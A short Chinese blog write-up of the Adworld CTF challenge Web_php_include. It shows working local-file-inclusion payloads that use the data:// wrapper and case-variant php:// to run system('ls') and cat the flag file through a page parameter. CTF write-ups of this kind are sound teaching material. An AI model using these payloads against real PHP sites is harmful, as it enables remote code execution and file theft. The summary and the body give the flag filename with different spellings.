攻防世界 Web_php_include WP

博客讲述了在遇到PHP安全过滤时,如何使用data伪协议和大小写绕过策略来构造payload,例如通过`<?system('ls');?>`和`<?system('cat flagisisish3r3.php');?>`来获取系统信息和文件内容。此外,还提到了利用Burp Suite进行抓包解决此类问题的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先看到如下

 

发现php://被过滤,可以用data伪协议,构造一个payload:

?page=data://text/plain,<?%20system(%27ls%27);?>

接着payload

 ?page=data://text/plain,<?%20system(%27cat%20fl4gisisish3r3.php%27);?>

 

 然后再查看器里看到flag

这道题也可以用burp抓包来解决,由于php://过滤,可以大小写绕过,然后post

<? system('ls');?>

这里我也不知道为什么去掉php就可以,没去掉上传不了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值